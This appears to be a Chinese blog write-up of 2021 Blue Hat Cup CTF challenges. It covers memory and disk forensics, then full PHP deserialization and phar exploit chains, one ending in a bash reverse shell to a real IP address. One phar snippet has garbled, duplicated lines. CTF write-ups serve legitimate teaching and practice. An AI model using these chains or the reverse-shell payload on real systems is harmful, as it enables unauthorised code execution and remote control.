Toc
  1. MIsc
    1. 博人的文件
    2. 溯源取证–被黑的系统
  2. Web
    1. 杰克与肉丝
    2. 不一样的web
Toc
0 results found
Rayi
2021第五届蓝帽杯分区赛部分Writeup
2021/06/07 WriteUp WriteUp

部分wp,包括赛后复现的

北部赛区的会议室太小了,四支队伍对着坐,都能打麻将了

题还可以,不算阴间,只能说自己比赛的时候脑子没转过来,好多题复现的时候感觉自己就是个智障。。。

MIsc

博人的文件

这一个镜像里看到了仨题,估计是出题人用了自己的虚拟机出的题

F:\BaiduNetdiskDownload\博人的文件\misc
λ python2 D:\RayiTools\取证工具\volatility2\vol.py -f 博人的电脑.raw imageinfo
Volatility Foundation Volatility Framework 2.6
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : Win7SP1x64, Win7SP0x64, Win2008R2SP0x64, Win2008R2SP1x64_23418, Win2008R2SP1x64, Win7SP1x64_23418
                     AS Layer1 : WindowsAMD64PagedMemory (Kernel AS)
                     AS Layer2 : FileAddressSpace (F:\BaiduNetdiskDownload\博人的文件\misc\博人的电脑.raw)
                      PAE type : No PAE
                           DTB : 0x187000L
                          KDBG : 0xf8000404d0a0L
          Number of Processors : 1
     Image Type (Service Pack) : 1
                KPCR for CPU 0 : 0xfffff8000404ed00L
             KUSER_SHARED_DATA : 0xfffff78000000000L
           Image date and time : 2021-04-23 04:59:23 UTC+0000
     Image local date and time : 2021-04-23 12:59:23 +0800

扫描文件,有一个hello.pdf

python2 D:\RayiTools\取证工具\volatility2\vol.py -f 博人的电脑.raw --profile=Win7SP1x64 filescan > file2.txt

image-20210606120004632

dump出来

python2 D:\RayiTools\取证工具\volatility2\vol.py -f 博人的电脑.raw --profile=Win7SP1x64 dumpfiles -Q 0x00000000
7e8a3f20 -n --dump-dir=./

用010editor查看,发现后门程序

image-20210606120159554

dump出相应的程序,这里有俩,只有一个dump出来的好使

image-20210606120232900

image-20210606120240666

解压出svhost.exe,是一个pyinstaller打包的exe,用pyinstxtractor解包

修复下pyc文件头

image-20210606121353784

uncompyle6反编译

uncompyle6 transfer.pyc > transfer.py

找到相关ip和用户名

image-20210606121431064

根据hacker.zip的注释,得到解压密码192.168.0.129fei

image-20210606121530163

/home/share中找到了一个加密的压缩包setups

再去翻翻内存,从用户哈希中找到一个可疑的哈希,可以解出是jameslyl

python2 D:\RayiTools\取证工具\volatility2\vol.py -f 博人的电脑.raw --profile=Win7SP1x64 hashdump

image-20210606121920873

解压压缩包,得到图片result.png

图片放大看能看到许多彩色像素点,尝试用PIL库进行缩放

图片的尺寸为:3160 x 1846,像素点的排列间隔规律如下:

x : 14,13,14,13 ......
y : 31,32,31,31,32,31,31,31,32 ......

去掉边框后粗略计算,把图片缩放到(242-224) x (59-61)左右即可得到正确的缩放

为了确保缩放时PIL选取的像素点正确,采用Image.NEAREST的充采样方法

from PIL import Image

for i in range(224,242):
    for j in range(59,61):
        img = Image.open('result.png')
        img = img.resize((i,j),Image.NEAREST)
        img.save(str(i) + 'x' + str(j) + '.png')

最后在234x59.png缩放部分找到了flag

234x59

溯源取证–被黑的系统

问题:

现在请你根据获取到的镜像服务器内容,回答以下问题:
q: 黑客通过哪个端口攻击进入的? == A
q: 黑客修改后的root密码是什么? == B
q: 黑客释放的工具服务端ip地址是什么? == C
q: 黑客窃取的秘密文件 md5 是什么? == D

flag = flag{md5(A-B-C-D)}

假如答案依次为 44,admin1234,1.2.3.4,ea8d35dca54375cbe711823545513fae
flag = flag(md5("44-admin1234-1.2.3.4-ea8d35dca54375cbe711823545513fae")) = flag{e9835dddd96a2ff70437c201618a8174}

vmdk文件,先用Xways挂载为磁盘,提取出文件分区

image-20210606165119704

然后上取证大师,看日志

image-20210606165856950

关于入侵端口,可以看出黑客是从thinkphp这里入侵的,thinkphp可能挂载在80或8080端口

image-20210606170033421

关于root密码,去爆破shadows文件

image-20210606170141370

关于秘密文件,可以看bash记录

image-20210606170400009

找到这个文件,计算md5,这个文件夹下俩文件的md5一样的

image-20210606170345483

关于攻击者的ip地址,可以找到frp工具,运行即可发现ip

image-20210607150205873

image-20210607150150663

image-20210607150142914

最终flag:

flag{md5(8080-123465-211.211.171.11-5363d0b99d892ecda988fd58e893bfe0)}
flag{d098c29b838c73e0819854c05f23307d}

Web

杰克与肉丝

审代码

<?php
highlight_file(__file__);


class Jack
{
    private $action;


    function __set($a, $b)
    {
        $b->$a();

    }

}

class Love {

    public $var;
    function __call($a,$b)
    {
        $rose = $this->var;
        call_user_func($rose);
    }

    private function action(){
        echo "jack love rose";
    }

}
class Titanic{
    public $people;
    public $ship;
    function __destruct(){

        $this->people->action=$this->ship;
    }
}
class Rose{
    public $var1;
    public $var2;
    function __invoke(){
        if( ($this->var1 != $this->var2) && (md5($this->var1) === md5($this->var2)) && (sha1($this->var1)=== sha1($this->var2)) ){
            eval($this->var1);
        }
    }
}

if(isset($_GET['love'])){
    $sail=$_GET['love'];
    unserialize($sail);
}
?>

反序列化,调用__invoke

然后利用Exception类绕过md5、sha1等

https://blog.csdn.net/LYJ20010728/article/details/114493052

exp:

<?php

class Jack
{
    private $action;
    function __set($a, $b)
    {
        $b->$a();

    }

}

class Love {

    public $var;
    function __call($a,$b)
    {
        $rose = $this->var;
        call_user_func($rose);
    }

    private function action(){
        echo "jack love rose";
    }

}
class Titanic{
    public $people;
    public $ship;
    function __destruct(){

        $this->people->action=$this->ship;
    }
}
class Rose{
    public $var1;
    public $var2;
    function __invoke(){
        if( ($this->var1 != $this->var2) && (md5($this->var1) === md5($this->var2)) && (sha1($this->var1)=== sha1($this->var2)) ){
            eval($this->var1);
        }else{
            echo 'nonono';
        }
    }
}

// if(isset($_GET['love'])){
//     $sail=$_GET['love'];
//     unserialize($sail);
// }

$a = new Titanic();
$b = new Jack();
$c = new Love();
$d = new Rose();
$file = "/flag";
$str = "?>"."<?php echo include~".urldecode(urlencode(~$file))."?>";
$except1 = new Exception($str, 1);
$except2 = new Exception($str, 2);
$d->var1= $except1;
$d->var2= $except2;
$c->var = $d;
$a->ship = $c;
$a->people = $b;

echo urlencode(serialize($a));

?>

不一样的web

先右键查看源码,发现一部分源码

class Read{
    public $name;
    public function file_get()
    {
        $text = base64_encode(file_get_contents("lib.php"));
        echo $text;
    }

}
class Test{
    public $f;
    public function __construct($value){
        $this->f = $value;
    }

    public function __wakeup()
    {
        $func = $this->f;
        $func();
    }
}

随便上传一个gif文件,发现可以显示上传路径

image-20210604161406977

尝试check图片,显示文件存在,猜测存在phar反序列化漏洞

image-20210604161458390

利用一开始给的源码,读出lib.php,注意php的版本是php5.6

<?php
class Read{
    public $name;
    public function file_get()
    {
        $text = base64_encode(file_get_contents("lib.php"));
        echo $text;
    }

}

class Test{
    public $f;
    public function __construct($value){
        $this->f = $value;
    }

    public function __wakeup()
    {
        $func = $this->f;
        $func();
    }
}

$poc = new Test(array("Read","file_get"));

$phar = new Phar('lib.phar');
$phar -> startBuffering();
$phar -> setStub('<?php __HALT_COMPILER();?>');
$phar -> ad;
$phar -> setMetadata($poc);
$phar -> stopBuffering();
?>

r -> stopBuffering();
?>


修改Content-Type和后缀,上传,然后获取目录,触发

![image-20210604163148366](http://pic.rayi.vip/image-20210604163148366.png)

得到`lib.php`源码,审计后直接弹shell

```php
<?php
error_reporting(0);
class Modifier{
  public $old_id;
  public $new_id;
  public $p_id;
  public function __construct(){
    $this->old_id = "1";
    $this->new_id = "0";
    $this->p_id = "1";
  }
  public function __get($value){
    $new_id = $value;
    // 使用=&
    $this->old_id = random_bytes(16);
    if($this->old_id===$this->new_id){
      system($this->p_id);
    }
  }
}
class Read{
    public function file_get()
    {
        $text = base64_encode(file_get_contents("lib.php"));
        echo $text;
    }

}
class Files{
  public $filename;
  public function __construct($filename){
    $this->filename = $this->FilesWaf($filename);
  }
  public function __wakeup(){
    $this->FilesWaf($this->filename);
  }
  public function __toString(){
    return $this->filename;
  }
  public function __destruct(){
    echo "Your file is ".$this->FilesWaf($this->filename).".</br>";
    
  }
  public function FilesWaf($name){
    if(stristr($name, "/")!==False){
      return "index.php";
    }
    return $name;
  }
}
class Test{
    public $f;
    public function __construct($value){
        $this->f = $value;
    }

    public function __wakeup()
    {
    $func = $this->f;
        $func();
    }
}
class User{
  public $name;
  public $profile;
  public function __construct($name){
    $this->name = $this->UserWaf($name);
    $this->profile = "I am admin.";
  }
  public function __wakeup(){
    $this->UserWaf($this->name);
  }
  public function __toString(){
    return $this->profile->name;
  }
  public function __destruct(){
    echo "Hello ".$this->UserWaf($this->name).".</br>";
    
  }
  public function UserWaf($name){
    if(strlen($name)>10){
      return "admin";
    }
    if(!preg_match("/[a-f0-9]/iu",$name)){
      return "admin";
    }
    return $name;
  }
}

$a = new Files();
$a->filename = new User();
$shell = new Modifier();
$shell->p_id = 'bash -c "bash -i >& /dev/tcp/47.104.134.135/2333 0>&1"';
$shell->old_id =& $shell->new_id; 
$a->filename->profile = $shell;
echo serialize($a);
$phar = new Phar('shell.phar');
$phar->startBuffering();
$phar->setStub('<?php __HALT_COMPILER();?>');
$phar->addFromString('test.txt','test');
$phar->setMetadata($a);
$phar->stopBuffering();
?>

写马

image-20210604170158929

根目录有个game,下载下来,运行,多试两边就有密码了

image-20210604170411338

用flag用户登录就有flag

image-20210604122502361

本文作者:Rayi
版权声明:本文首发于Rayi的博客,转载请注明出处!